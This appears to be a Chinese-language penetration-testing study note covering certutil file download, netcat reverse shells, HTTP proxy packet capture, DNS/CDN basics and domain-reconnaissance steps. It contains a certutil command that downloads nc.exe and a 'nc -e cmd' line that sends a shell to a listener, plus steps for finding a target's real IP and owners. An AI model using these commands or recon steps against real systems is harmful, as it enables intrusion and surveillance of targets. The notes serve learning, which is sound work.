基础

文件下载
certutil.exe -urlcache -split -f http://127.0.0.1:8080/nc.exe nc.exe
反弹shell

一端进行监听,一端进行连接,将连接一端的shell进行反弹给监听一端

#Netcat连接端
nc -e cmd 127.0.0.1 8080

#监听端
nc -lvvp 8080

捕获

内网

​ 内网 -> A

​ A !-> 内网

如果两台主机都处于外网,则可以相互进行反弹

A <-> B

A防火墙 -> B

b !-> A防火墙

抓包

抓包工具:

  • BurpSuite
  • 茶杯
  • fiddler
模拟器设置证书后
设置HTTP代理 -> 运行工具的本机IP 端口
burpsuite 茶杯 fiddler 配置代理监听抓取
域名
DNS

DNS用于解析IP地址

它是一个域名和IP地址相互映射的一个分布式数据库,能够使人更方便迅速的访问互联网

DNS使用的是UDP协议,端口53

CDN

旁注

旁注:同服务器不同站点

前提条件:多个站点服务器

C段

独立站点服务器

C段:不同服务器不同站点

资产架构与信息收集

域名:

  • 查询域名注册邮箱
  • 通过域名查询备案号
  • 通过备案号查询域名
  • 反查注册邮箱
  • 反查注册人
  • 通过注册人查询到的域名在查询邮箱
  • 通过上一步邮箱去查询域名
  • 通过上一步邮箱去查询域名
  • 查询以上获取出的域名的子域名
  1. CDN验证:通过多地ping的方法确定目标是否使用CDN
  2. 域名查找:查找域名父域和子域名来查看正式IP
  3. 历史纪录查找:可以通过查找域名解析记录的方式去查找真实IP
  4. 子域名爆破
  5. 通过证书手机信息
  6. 搜索引擎
  7. 通过域名查公司,查企业,查人物
  8. 通过人物查资产
  9. …..

常用工具

https://www.ip138.com/

https://ping.pe/

https://whois.chinaz.com/

http://ping.chinaz.com/